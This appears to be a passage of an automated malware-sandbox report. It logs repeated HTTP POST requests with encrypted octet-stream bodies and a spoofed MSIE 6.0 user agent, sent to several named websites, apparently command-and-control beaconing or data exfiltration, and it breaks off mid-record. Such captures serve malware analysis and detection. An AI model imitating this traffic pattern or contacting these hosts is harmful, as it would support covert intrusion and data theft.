                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 67 38 49 70 72 4f 73 38 6d 35 75 43 39 78 32 4c 77 71 32 4a 38 46 54 57 46 7a 75 78 38 59 74 33 54 30 58 78 37 34 35 34 68 59 63 5a 63 6e 54 59 67 72 38 71 67 44 44 6f 53 49 73 2f 49 59 57 2f 61 52 34 77 2f 32 47 2f 30 55 50 33 6a 41 5a 70 45 5a 30 35 45 67 67 31 59 48 34 75 70 50 32 38 57 4d 30 52 31 79 62 62 59 56 72 49 45 63 66 6f 37 4d 67 6a 4f 2f 4f 4c 57 42 48 51 37 64 62 45 4f 71 51 4f 74 65 76 4b 53 42 37 4b 43 62 46 77 4d 4d 6a 33 2b 4c 5a 62 2f 32 78 34 51 5a 56 4d 56 76 66 4c 36 43 4f 77 55 41 59 50 52 54 42 7a 30 4a 67 34 36 72 43 4e 42 51 48 43 68 55 63 39 36 70 42 57 70 4a 50 31 59 4f 79 4a 49 5a 44 79 41 4b 6a 41 50 54 62 69 72 55 6a 49 53 45 65 50 4f 6b 52 72 36 54 30 4f 6d 38 57 51 36 47 63 61 4b 6a 68 79 52 6c 6c 55 35 37 39 70 38 71 6b 4c 44 73 51 59 33 59 7a 73 34 35 64 78 4d 6d 44 6c 59 4e 44 49 77 31 4f 74 47 71 61 43 50 61 62 67 70 4a 41 6f 70 74 43 45 57 6d 4a 38 4d 30 71 4e 48 62 45 47 45 41 49 2f 4f 50 79 31 62 75 75 4a 66 41 6f 76 71 57 63 4b 46 4f 61 7a 30 59 35 31 5a 55 32 46 6b 2b 54 63 63 63 41 56 4f 4c 45 4a 69 78 55 57 6d 69 39 59 2b 50 75 67 45 70 4c 51 62 4b 2b 47 4e 78 48 64 71 5a 52 54 71 6f 39 77 79 47 6b 49 37 75 38 6e 66 6b 31 76 57 73 4c 4d 38 76 48 5a 6f 39 65 45 32 37 71 79 48 78 37 35 75 42 4c 7a 6a 2b 6a 6c 7a 48 78 70 48 58 6f 50 39 35 50 6f 6e 59 66 51 39 64 51 58 76 62 48 6e 6e 55 58 68 7a 78 79 73 49 59 43 69 57 74 79 4e 31 57 4d 44 32 78 6c 4e 77 41 2f 67 6d 38 6b 65 39 75 65 6b 55 2f 77 45 54 79 63 6f 31 31 77 74 48 62 56 75 41 78 47 45 4b 46 76 35 38 68 7a 6f 67 34 58 59 2f 64 6a 33 78 6c 78 77 71 34 68 78 41 4b 2f 68 37 66 64 31 75 48 43 6c 78 51 79 4a 51 4a 42 6b 50 56 51 56 43 4e 45 3d Data Ascii: g8IprOs8m5uC9x2Lwq2J8FTWFzux8Yt3T0Xx7454hYcZcnTYgr8qgDDoSIs/IYW/aR4w/2G/0UP3jAZpEZ05Egg1YH4upP28WM0R1ybbYVrIEcfo7MgjO/OLWBHQ7dbEOqQOtevKSB7KCbFwMMj3+LZb/2x4QZVMVvfL6COwUAYPRTBz0Jg46rCNBQHChUc96pBWpJP1YOyJIZDyAKjAPTbirUjISEePOkRr6T0Om8WQ6GcaKjhyRllU579p8qkLDsQY3Yzs45dxMmDlYNDIw1OtGqaCPabgpJAoptCEWmJ8M0qNHbEGEAI/OPy1buuJfAovqWcKFOaz0Y51ZU2Fk+TcccAVOLEJixUWmi9Y+PugEpLQbK+GNxHdqZRTqo9wyGkI7u8nfk1vWsLM8vHZo9eE27qyHx75uBLzj+jlzHxpHXoP95PonYfQ9dQXvbHnnUXhzxysIYCiWtyN1WMD2xlNwA/gm8ke9uekU/wETyco11wtHbVuAxGEKFv58hzog4XY/dj3xlxwq4hxAK/h7fd1uHClxQyJQJBkPVQVCNE=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tvtools.fiCache-Control: no-cacheData Raw: 35 74 50 42 6b 68 67 4c 47 57 50 78 75 38 38 33 47 78 4e 34 56 41 73 65 46 55 6a 67 4d 36 63 4c 7a 4f 65 44 65 38 75 36 4a 75 44 54 37 4a 61 6d 6d 52 37 6c 69 44 35 6d 5a 44 45 48 31 61 43 71 5a 78 79 73 77 6f 35 74 4a 72 4b 72 65 76 69 77 6b 57 64 52 4d 4f 71 61 4c 43 55 6d 5a 69 35 65 67 4c 71 51 73 76 7a 33 49 59 65 2f 55 5a 47 6b 44 55 73 61 6a 64 4e 69 75 74 44 4a 76 49 71 39 45 70 31 36 73 34 71 4e 58 36 74 59 6a 57 56 52 69 4c 59 36 74 39 66 7a 6b 62 48 65 56 37 4f 2b 46 4f 73 41 32 71 2b 59 53 61 2f 4e 49 76 6f 5a 41 6b 41 58 66 71 55 49 62 76 41 41 76 6f 2f 68 44 52 5a 72 62 49 73 41 54 52 46 2b 52 74 4f 37 52 6e 6e 6d 30 69 47 6e 32 43 55 69 50 6d 38 6c 4f 4f 77 6d 74 47 63 72 56 62 77 64 4e 50 35 57 64 35 74 76 68 44 7a 54 64 72 2f 7a 70 5a 2b 57 39 70 4f 59 6a 4e 44 6d 47 35 47 52 39 5a 37 34 47 54 54 52 68 31 4d 7a 6a 62 4f 50 43 36 71 71 78 36 70 51 73 73 6a 49 70 72 61 4b 6c 69 49 69 57 73 45 4f 49 31 5a 7a 4e 37 6d 43 55 50 37 59 35 2f 4a 6b 39 67 37 32 4c 35 4f 47 54 74 56 75 4a 78 30 6b 77 54 6c 45 49 5a 6a 7a 44 64 55 46 32 31 67 48 73 6a 36 6d 68 34 51 6c 59 61 54 5a 59 65 70 41 32 49 5a 67 45 47 69 51 39 54 46 4b 57 62 4a 57 42 54 44 33 70 51 35 74 37 44 64 76 41 49 55 77 52 31 58 47 35 6f 6b 53 2f 39 46 4d 4d 6d 62 79 5a 70 47 75 58 65 30 6b 41 41 65 33 53 55 41 5a 39 54 34 56 67 79 6a 37 75 51 74 62 63 31 4d 45 65 65 70 46 4a 67 55 78 78 70 69 43 42 4f 30 47 79 4f 63 67 54 6a 72 45 6f 4f 66 55 32 4f 71 57 4e 57 52 43 37 37 75 2f 7a 36 59 64 50 66 38 72 56 36 52 52 69 65 39 39 42 30 53 4a 44 49 65 46 50 45 76 67 65 47 72 63 32 39 35 34 33 77 35 76 48 32 49 79 36 51 6e 61 65 6d 7a 4c 70 32 4f 62 47 45 2b 48 34 64 55 64 5a 48 6b 3d Data Ascii: 5tPBkhgLGWPxu883GxN4VAseFUjgM6cLzOeDe8u6JuDT7JammR7liD5mZDEH1aCqZxyswo5tJrKreviwkWdRMOqaLCUmZi5egLqQsvz3IYe/UZGkDUsajdNiutDJvIq9Ep16s4qNX6tYjWVRiLY6t9fzkbHeV7O+FOsA2q+YSa/NIvoZAkAXfqUIbvAAvo/hDRZrbIsATRF+RtO7Rnnm0iGn2CUiPm8lOOwmtGcrVbwdNP5Wd5tvhDzTdr/zpZ+W9pOYjNDmG5GR9Z74GTTRh1MzjbOPC6qqx6pQssjIpraKliIiWsEOI1ZzN7mCUP7Y5/Jk9g72L5OGTtVuJx0kwTlEIZjzDdUF21gHsj6mh4QlYaTZYepA2IZgEGiQ9TFKWbJWBTD3pQ5t7DdvAIUwR1XG5okS/9FMMmbyZpGuXe0kAAe3SUAZ9T4Vgyj7uQtbc1MEeepFJgUxxpiCBO0GyOcgTjrEoOfU2OqWNWRC77u/z6YdPf8rV6RRie99B0SJDIeFPEvgeGrc29543w5vH2Iy6QnaemzLp2ObGE+H4dUdZHk=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 67 38 49 70 72 4f 73 38 6d 35 75 43 39 78 32 4c 77 71 32 4a 38 46 54 57 46 7a 75 78 38 59 74 33 54 30 58 78 37 34 35 34 68 59 63 5a 63 6e 54 59 67 72 38 71 67 44 44 6f 53 49 73 2f 49 59 57 2f 61 52 34 77 2f 32 47 2f 30 55 50 33 6a 41 5a 70 45 5a 30 35 45 67 67 31 59 48 34 75 70 50 32 38 57 4d 30 52 31 79 62 62 59 56 72 49 45 63 66 6f 37 4d 67 6a 4f 2f 4f 4c 57 42 48 51 37 64 62 45 4f 71 51 4f 74 65 76 4b 53 42 37 4b 43 62 46 77 4d 4d 6a 33 2b 4c 5a 62 2f 32 78 34 51 5a 56 4d 56 76 66 4c 36 43 4f 77 55 41 59 50 52 54 42 7a 30 4a 67 34 36 72 43 4e 42 51 48 43 68 55 63 39 36 70 42 57 70 4a 50 31 59 4f 79 4a 49 5a 44 79 41 4b 6a 41 50 54 62 69 72 55 6a 49 53 45 65 50 4f 6b 52 72 36 54 30 4f 6d 38 57 51 36 47 63 61 4b 6a 68 79 52 6c 6c 55 35 37 39 70 38 71 6b 4c 44 73 51 59 33 59 7a 73 34 35 64 78 4d 6d 44 6c 59 4e 44 49 77 31 4f 74 47 71 61 43 50 61 62 67 70 4a 41 6f 70 74 43 45 57 6d 4a 38 4d 30 71 4e 48 62 45 47 45 41 49 2f 4f 50 79 31 62 75 75 4a 66 41 6f 76 71 57 63 4b 46 4f 61 7a 30 59 35 31 5a 55 32 46 6b 2b 54 63 63 63 41 56 4f 4c 45 4a 69 78 55 57 6d 69 39 59 2b 50 75 67 45 70 4c 51 62 4b 2b 47 4e 78 48 64 71 5a 52 54 71 6f 39 77 79 47 6b 49 37 75 38 6e 66 6b 31 76 57 73 4c 4d 38 76 48 5a 6f 39 65 45 32 37 71 79 48 78 37 35 75 42 4c 7a 6a 2b 6a 6c 7a 48 78 70 48 58 6f 50 39 35 50 6f 6e 59 66 51 39 64 51 58 76 62 48 6e 6e 55 58 68 7a 78 79 73 49 59 43 69 57 74 79 4e 31 57 4d 44 32 78 6c 4e 77 41 2f 67 6d 38 6b 65 39 75 65 6b 55 2f 77 45 54 79 63 6f 31 31 77 74 48 62 56 75 41 78 47 45 4b 46 76 35 38 68 7a 6f 67 34 58 59 2f 64 6a 33 78 6c 78 77 71 34 68 78 41 4b 2f 68 37 66 64 31 75 48 43 6c 78 51 79 4a 51 4a 42 6b 50 56 51 56 43 4e 45 3d Data Ascii: g8IprOs8m5uC9x2Lwq2J8FTWFzux8Yt3T0Xx7454hYcZcnTYgr8qgDDoSIs/IYW/aR4w/2G/0UP3jAZpEZ05Egg1YH4upP28WM0R1ybbYVrIEcfo7MgjO/OLWBHQ7dbEOqQOtevKSB7KCbFwMMj3+LZb/2x4QZVMVvfL6COwUAYPRTBz0Jg46rCNBQHChUc96pBWpJP1YOyJIZDyAKjAPTbirUjISEePOkRr6T0Om8WQ6GcaKjhyRllU579p8qkLDsQY3Yzs45dxMmDlYNDIw1OtGqaCPabgpJAoptCEWmJ8M0qNHbEGEAI/OPy1buuJfAovqWcKFOaz0Y51ZU2Fk+TcccAVOLEJixUWmi9Y+PugEpLQbK+GNxHdqZRTqo9wyGkI7u8nfk1vWsLM8vHZo9eE27qyHx75uBLzj+jlzHxpHXoP95PonYfQ9dQXvbHnnUXhzxysIYCiWtyN1WMD2xlNwA/gm8ke9uekU/wETyco11wtHbVuAxGEKFv58hzog4XY/dj3xlxwq4hxAK/h7fd1uHClxQyJQJBkPVQVCNE=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 67 38 49 70 72 4f 73 38 6d 35 75 43 39 78 32 4c 77 71 32 4a 38 46 54 57 46 7a 75 78 38 59 74 33 54 30 58 78 37 34 35 34 68 59 63 5a 63 6e 54 59 67 72 38 71 67 44 44 6f 53 49 73 2f 49 59 57 2f 61 52 34 77 2f 32 47 2f 30 55 50 33 6a 41 5a 70 45 5a 30 35 45 67 67 31 59 48 34 75 70 50 32 38 57 4d 30 52 31 79 62 62 59 56 72 49 45 63 66 6f 37 4d 67 6a 4f 2f 4f 4c 57 42 48 51 37 64 62 45 4f 71 51 4f 74 65 76 4b 53 42 37 4b 43 62 46 77 4d 4d 6a 33 2b 4c 5a 62 2f 32 78 34 51 5a 56 4d 56 76 66 4c 36 43 4f 77 55 41 59 50 52 54 42 7a 30 4a 67 34 36 72 43 4e 42 51 48 43 68 55 63 39 36 70 42 57 70 4a 50 31 59 4f 79 4a 49 5a 44 79 41 4b 6a 41 50 54 62 69 72 55 6a 49 53 45 65 50 4f 6b 52 72 36 54 30 4f 6d 38 57 51 36 47 63 61 4b 6a 68 79 52 6c 6c 55 35 37 39 70 38 71 6b 4c 44 73 51 59 33 59 7a 73 34 35 64 78 4d 6d 44 6c 59 4e 44 49 77 31 4f 74 47 71 61 43 50 61 62 67 70 4a 41 6f 70 74 43 45 57 6d 4a 38 4d 30 71 4e 48 62 45 47 45 41 49 2f 4f 50 79 31 62 75 75 4a 66 41 6f 76 71 57 63 4b 46 4f 61 7a 30 59 35 31 5a 55 32 46 6b 2b 54 63 63 63 41 56 4f 4c 45 4a 69 78 55 57 6d 69 39 59 2b 50 75 67 45 70 4c 51 62 4b 2b 47 4e 78 48 64 71 5a 52 54 71 6f 39 77 79 47 6b 49 37 75 38 6e 66 6b 31 76 57 73 4c 4d 38 76 48 5a 6f 39 65 45 32 37 71 79 48 78 37 35 75 42 4c 7a 6a 2b 6a 6c 7a 48 78 70 48 58 6f 50 39 35 50 6f 6e 59 66 51 39 64 51 58 76 62 48 6e 6e 55 58 68 7a 78 79 73 49 59 43 69 57 74 79 4e 31 57 4d 44 32 78 6c 4e 77 41 2f 67 6d 38 6b 65 39 75 65 6b 55 2f 77 45 54 79 63 6f 31 31 77 74 48 62 56 75 41 78 47 45 4b 46 76 35 38 68 7a 6f 67 34 58 59 2f 64 6a 33 78 6c 78 77 71 34 68 78 41 4b 2f 68 37 66 64 31 75 48 43 6c 78 51 79 4a 51 4a 42 6b 50 56 51 56 43 4e 45 3d Data Ascii: g8IprOs8m5uC9x2Lwq2J8FTWFzux8Yt3T0Xx7454hYcZcnTYgr8qgDDoSIs/IYW/aR4w/2G/0UP3jAZpEZ05Egg1YH4upP28WM0R1ybbYVrIEcfo7MgjO/OLWBHQ7dbEOqQOtevKSB7KCbFwMMj3+LZb/2x4QZVMVvfL6COwUAYPRTBz0Jg46rCNBQHChUc96pBWpJP1YOyJIZDyAKjAPTbirUjISEePOkRr6T0Om8WQ6GcaKjhyRllU579p8qkLDsQY3Yzs45dxMmDlYNDIw1OtGqaCPabgpJAoptCEWmJ8M0qNHbEGEAI/OPy1buuJfAovqWcKFOaz0Y51ZU2Fk+TcccAVOLEJixUWmi9Y+PugEpLQbK+GNxHdqZRTqo9wyGkI7u8nfk1vWsLM8vHZo9eE27qyHx75uBLzj+jlzHxpHXoP95PonYfQ9dQXvbHnnUXhzxysIYCiWtyN1WMD2xlNwA/gm8ke9uekU/wETyco11wtHbVuAxGEKFv58hzog4XY/dj3xlxwq4hxAK/h7fd1uHClxQyJQJBkPVQVCNE=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 67 38 49 70 72 4f 73 38 6d 35 75 43 39 78 32 4c 77 71 32 4a 38 46 54 57 46 7a 75 78 38 59 74 33 54 30 58 78 37 34 35 34 68 59 63 5a 63 6e 54 59 67 72 38 71 67 44 44 6f 53 49 73 2f 49 59 57 2f 61 52 34 77 2f 32 47 2f 30 55 50 33 6a 41 5a 70 45 5a 30 35 45 67 67 31 59 48 34 75 70 50 32 38 57 4d 30 52 31 79 62 62 59 56 72 49 45 63 66 6f 37 4d 67 6a 4f 2f 4f 4c 57 42 48 51 37 64 62 45 4f 71 51 4f 74 65 76 4b 53 42 37 4b 43 62 46 77 4d 4d 6a 33 2b 4c 5a 62 2f 32 78 34 51 5a 56 4d 56 76 66 4c 36 43 4f 77 55 41 59 50 52 54 42 7a 30 4a 67 34 36 72 43 4e 42 51 48 43 68 55 63 39 36 70 42 57 70 4a 50 31 59 4f 79 4a 49 5a 44 79 41 4b 6a 41 50 54 62 69 72 55 6a 49 53 45 65 50 4f 6b 52 72 36 54 30 4f 6d 38 57 51 36 47 63 61 4b 6a 68 79 52 6c 6c 55 35 37 39 70 38 71 6b 4c 44 73 51 59 33 59 7a 73 34 35 64 78 4d 6d 44 6c 59 4e 44 49 77 31 4f 74 47 71 61 43 50 61 62 67 70 4a 41 6f 70 74 43 45 57 6d 4a 38 4d 30 71 4e 48 62 45 47 45 41 49 2f 4f 50 79 31 62 75 75 4a 66 41 6f 76 71 57 63 4b 46 4f 61 7a 30 59 35 31 5a 55 32 46 6b 2b 54 63 63 63 41 56 4f 4c 45 4a 69 78 55 57 6d 69 39 59 2b 50 75 67 45 70 4c 51 62 4b 2b 47 4e 78 48 64 71 5a 52 54 71 6f 39 77 79 47 6b 49 37 75 38 6e 66 6b 31 76 57 73 4c 4d 38 76 48 5a 6f 39 65 45 32 37 71 79 48 78 37 35 75 42 4c 7a 6a 2b 6a 6c 7a 48 78 70 48 58 6f 50 39 35 50 6f 6e 59 66 51 39 64 51 58 76 62 48 6e 6e 55 58 68 7a 78 79 73 49 59 43 69 57 74 79 4e 31 57 4d 44 32 78 6c 4e 77 41 2f 67 6d 38 6b 65 39 75 65 6b 55 2f 77 45 54 79 63 6f 31 31 77 74 48 62 56 75 41 78 47 45 4b 46 76 35 38 68 7a 6f 67 34 58 59 2f 64 6a 33 78 6c 78 77 71 34 68 78 41 4b 2f 68 37 66 64 31 75 48 43 6c 78 51 79 4a 51 4a 42 6b 50 56 51 56 43 4e 45 3d Data Ascii: g8IprOs8m5uC9x2Lwq2J8FTWFzux8Yt3T0Xx7454hYcZcnTYgr8qgDDoSIs/IYW/aR4w/2G/0UP3jAZpEZ05Egg1YH4upP28WM0R1ybbYVrIEcfo7MgjO/OLWBHQ7dbEOqQOtevKSB7KCbFwMMj3+LZb/2x4QZVMVvfL6COwUAYPRTBz0Jg46rCNBQHChUc96pBWpJP1YOyJIZDyAKjAPTbirUjISEePOkRr6T0Om8WQ6GcaKjhyRllU579p8qkLDsQY3Yzs45dxMmDlYNDIw1OtGqaCPabgpJAoptCEWmJ8M0qNHbEGEAI/OPy1buuJfAovqWcKFOaz0Y51ZU2Fk+TcccAVOLEJixUWmi9Y+PugEpLQbK+GNxHdqZRTqo9wyGkI7u8nfk1vWsLM8vHZo9eE27qyHx75uBLzj+jlzHxpHXoP95PonYfQ9dQXvbHnnUXhzxysIYCiWtyN1WMD2xlNwA/gm8ke9uekU/wETyco11wtHbVuAxGEKFv58hzog4XY/dj3xlxwq4hxAK/h7fd1uHClxQyJQJBkPVQVCNE=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 33 6d 6e 45 6d 77 46 57 47 57 4f 6d 78 68 45 44 34 4c 63 56 77 39 70 4a 4b 72 56 2f 5a 7a 47 79 78 56 52 6d 57 42 6a 52 4f 59 51 4d 48 71 74 43 42 70 75 70 62 2b 51 58 4e 57 74 68 66 4c 67 48 4d 44 58 33 68 44 4f 4c 6d 6e 67 78 6d 47 53 31 4d 47 7a 30 34 53 43 76 55 52 51 6f 7a 42 44 7a 56 57 6e 4e 76 54 66 62 56 57 69 76 78 76 49 5a 33 79 38 4a 68 55 77 36 61 4f 33 65 4a 50 47 6f 32 34 4d 48 74 58 48 65 69 6f 57 54 7a 38 73 37 57 34 50 73 47 48 39 48 51 63 6d 4a 75 33 6b 6e 69 64 42 63 57 51 67 75 35 4e 4f 6a 74 76 4b 78 4e 75 57 34 6e 67 49 59 71 73 30 39 68 79 67 48 52 66 76 30 32 52 35 42 50 7a 72 62 54 4d 63 53 48 72 58 52 61 6c 59 37 55 73 52 68 76 52 67 79 76 6d 6c 59 58 6e 68 37 44 77 4d 6c 46 6b 64 35 64 55 46 2b 6f 6a 53 2f 64 57 4e 56 78 70 30 6a 55 56 6c 79 57 47 54 2f 7a 4e 4a 4e 41 50 57 33 35 30 54 63 49 4d 64 6b 31 38 2f 45 70 4d 4f 30 47 61 45 6b 69 4c 43 57 6b 56 6e 4f 78 46 4f 71 43 68 76 71 4d 63 47 44 78 4a 47 63 7a 71 2f 78 6e 77 4f 78 73 35 41 33 6e 59 68 57 31 72 78 39 51 55 4e 37 38 34 50 5a 6f 42 68 75 49 5a 36 63 77 78 62 62 69 32 54 76 74 4d 2f 41 33 69 68 79 43 66 68 71 79 72 6a 4c 6c 6a 51 6d 54 77 7a 6a 56 52 58 71 52 38 47 6e 48 5a 44 41 78 42 43 4f 46 46 38 35 78 77 41 37 67 64 75 4a 51 5a 4b 43 67 56 69 6c 71 41 74 41 75 32 45 78 79 52 2b 72 38 52 68 58 37 58 2b 64 57 55 71 51 51 4e 56 6a 46 4c 56 74 6a 31 56 74 69 52 49 62 52 38 30 6c 4b 44 47 77 52 33 4a 6a 39 6d 36 35 42 5a 48 44 38 4d 6c 68 70 6a 4a 6d 76 70 70 6f 31 33 44 51 74 4c 53 4e 35 59 2f 4c 55 44 54 6f 68 73 2f 72 33 4c 6d 39 54 7a 6f 6e 5a 32 6b 6d 53 2f 69 4b 6d 56 48 53 70 37 4e 2f 53 78 73 50 35 61 4d 35 62 2f 2f 39 73 4c 35 61 33 51 3d 3d Data Ascii: 3mnEmwFWGWOmxhED4LcVw9pJKrV/ZzGyxVRmWBjROYQMHqtCBpupb+QXNWthfLgHMDX3hDOLmngxmGS1MGz04SCvURQozBDzVWnNvTfbVWivxvIZ3y8JhUw6aO3eJPGo24MHtXHeioWTz8s7W4PsGH9HQcmJu3knidBcWQgu5NOjtvKxNuW4ngIYqs09hygHRfv02R5BPzrbTMcSHrXRalY7UsRhvRgyvmlYXnh7DwMlFkd5dUF+ojS/dWNVxp0jUVlyWGT/zNJNAPW350TcIMdk18/EpMO0GaEkiLCWkVnOxFOqChvqMcGDxJGczq/xnwOxs5A3nYhW1rx9QUN784PZoBhuIZ6cwxbbi2TvtM/A3ihyCfhqyrjLljQmTwzjVRXqR8GnHZDAxBCOFF85xwA7gduJQZKCgVilqAtAu2ExyR+r8RhX7X+dWUqQQNVjFLVtj1VtiRIbR80lKDGwR3Jj9m65BZHD8MlhpjJmvppo13DQtLSN5Y/LUDTohs/r3Lm9TzonZ2kmS/iKmVHSp7N/SxsP5aM5b//9sL5a3Q==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 71 6a 52 4a 35 47 46 52 4c 47 4d 55 75 5a 35 52 77 4c 75 55 34 44 71 38 43 44 46 66 64 6d 2f 4a 4a 56 5a 61 74 4e 48 44 74 79 6e 4c 44 42 67 66 34 32 71 78 77 71 61 6a 4d 50 33 71 63 41 71 66 34 56 6e 64 6e 6d 51 70 4e 2b 53 75 44 6f 6c 4c 58 70 57 32 4f 36 2b 70 6b 4b 52 34 31 38 6a 6c 48 49 32 6d 31 79 70 67 75 71 70 39 41 47 58 6c 2b 35 54 63 78 48 2f 37 6c 54 75 2b 32 68 6f 4e 69 67 7a 43 67 6f 61 74 61 71 66 4d 35 64 78 56 32 56 76 45 52 41 62 79 43 65 47 34 6b 48 32 4b 75 35 61 67 30 69 64 30 4a 37 7a 49 47 63 37 6c 75 36 46 77 6a 78 6b 6a 56 4d 51 2f 76 6c 47 33 79 52 30 30 54 62 2f 32 45 47 74 45 46 74 6d 74 4a 69 68 6c 67 63 78 59 43 4a 39 59 37 37 47 56 66 54 50 42 6e 6a 6e 75 58 6b 34 77 6a 33 51 71 55 73 45 57 58 71 58 77 53 35 78 69 6b 5a 41 42 61 4b 35 6b 53 78 30 31 78 59 56 69 53 59 45 6d 31 65 4f 38 58 73 2f 47 5a 52 69 7a 33 47 6d 79 33 63 41 32 71 7a 78 54 54 69 54 75 53 6d 31 67 31 4b 55 53 6c 50 69 69 6f 54 4e 2f 49 50 4b 72 6d 55 6d 50 79 57 69 6e 71 62 35 49 79 5a 78 76 66 5a 71 68 48 76 34 4b 4b 46 48 73 32 51 58 39 4d 54 76 43 48 6c 56 35 51 6e 54 69 4c 38 5a 48 2f 66 4c 68 53 36 71 35 39 69 41 46 45 4a 58 65 4c 70 6a 6d 37 6f 4d 69 4e 49 78 65 6a 44 2f 62 79 74 37 36 58 6a 45 71 41 42 71 6c 66 5a 6b 50 31 61 5a 48 73 70 74 42 67 55 78 4c 63 52 61 48 35 77 69 4d 76 73 50 7a 74 51 41 2f 66 54 46 33 6b 5a 54 45 57 56 73 31 75 43 51 53 35 66 69 32 38 4c 4b 47 4a 59 73 46 71 36 4a 46 39 51 39 4b 31 70 39 30 5a 52 59 64 38 43 39 42 57 2f 54 51 4c 36 2b 59 71 63 39 37 48 6c 37 32 6b 42 43 62 55 76 41 33 66 76 4c 77 66 47 67 6e 45 4f 57 47 69 78 48 62 64 50 53 6e 72 70 72 79 50 42 41 68 4d 6d 4d 74 50 55 4c 52 35 37 77 2b 37 55 75 75 56 36 45 44 53 7a 4b 6a 2f 42 5a 49 67 4d 39 43 Data Ascii: qjRJ5GFRLGMUuZ5RwLuU4Dq8CDFfdm/JJVZatNHDtynLDBgf42qxwqajMP3qcAqf4VndnmQpN+SuDolLXpW2O6+pkKR418jlHI2m1ypguqp9AGXl+5TcxH/7lTu+2hoNigzCgoataqfM5dxV2VvERAbyCeG4kH2Ku5ag0id0J7zIGc7lu6FwjxkjVMQ/vlG3yR00Tb/2EGtEFtmtJihlgcxYCJ9Y77GVfTPBnjnuXk4wj3QqUsEWXqXwS5xikZABaK5kSx01xYViSYEm1eO8Xs/GZRiz3Gmy3cA2qzxTTiTuSm1g1KUSlPiioTN/IPKrmUmPyWinqb5IyZxvfZqhHv4KKFHs2QX9MTvCHlV5QnTiL8ZH/fLhS6q59iAFEJXeLpjm7oMiNIxejD/byt76XjEqABqlfZkP1aZHsptBgUxLcRaH5wiMvsPztQA/fTF3kZTEWVs1uCQS5fi28LKGJYsFq6JF9Q9K1p90ZRYd8C9BW/TQL6+Yqc97Hl72kBCbUvA3fvLwfGgnEOWGixHbdPSnrpryPBAhMmMtPULR57w+7UuuV6EDSzKj/BZIgM9C
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vitaindu.comCache-Control: no-cacheData Raw: 30 6d 6b 63 31 7a 66 79 70 4a 73 55 69 5a 34 78 70 69 71 77 67 34 44 52 52 7a 76 74 66 76 4f 45 57 34 48 31 46 4e 4b 4e 36 44 31 74 70 42 6f 50 57 73 2f 64 54 4c 39 62 69 31 47 63 6d 69 4d 76 30 7a 36 38 4a 74 36 46 34 54 67 2b 6a 2f 57 52 50 31 54 4c 72 45 4c 53 4d 57 70 50 43 6d 52 55 69 65 77 71 44 30 45 61 39 73 54 73 4e 79 36 4a 58 6c 78 37 37 47 48 43 52 36 67 63 6d 56 38 7a 6a 36 49 44 56 7a 4a 48 4e 65 50 50 38 42 41 2f 74 6e 64 6a 4d 30 66 7a 76 68 59 45 38 41 79 68 50 4e 78 65 62 64 2f 42 54 30 30 73 4b 4b 6d 63 46 45 62 65 58 63 4e 34 75 6c 43 6c 34 37 53 6c 45 6e 55 78 45 4f 41 38 6e 64 65 77 39 4a 68 6d 44 44 4d 76 59 6f 32 39 79 34 4e 57 7a 4e 49 47 36 67 64 64 4c 63 56 7a 6b 41 44 46 30 56 6c 72 66 38 4a 6f 67 46 75 7a 4b 57 2b 66 37 75 30 4b 56 64 2f 39 79 49 30 2f 66 50 57 6d 36 78 4a 31 77 5a 37 50 75 7a 31 78 54 6e 6a 36 44 6b 30 6e 65 4f 45 55 61 66 34 76 75 53 46 49 43 54 4e 6f 6c 36 32 57 38 39 39 2b 39 52 35 42 59 33 34 4e 47 67 38 2b 56 78 35 37 78 69 31 75 44 63 46 4f 64 73 74 37 47 4d 59 41 51 68 6f 68 67 56 42 6f 37 59 51 69 63 43 53 6e 31 54 4c 32 4d 37 41 68 46 59 2b 32 4a 30 56 68 48 6b 34 57 44 54 30 53 63 6f 50 6b 53 67 42 71 48 7a 65 49 72 46 6f 6a 32 63 6f 57 59 68 43 6c 54 56 55 55 4a 71 33 47 5a 75 43 6d 56 41 59 53 75 30 75 6e 59 55 6c 34 72 2b 6f 61 39 61 2b 75 50 4b 62 62 6e 49 34 64 70 56 71 39 62 69 46 53 42 61 59 69 39 51 48 78 67 66 33 61 50 75 75 39 37 69 46 74 54 36 36 64 2b 53 43 62 71 7a 2b 78 47 45 5a 4a 45 6d 51 72 75 48 54 33 32 7a 78 33 32 69 36 43 67 79 2f 6e 6e 43 43 5a 47 6f 74 6d 72 72 55 4c 69 53 38 6d 32 34 6b 75 6d 52 78 64 35 50 6d 39 Data Ascii: 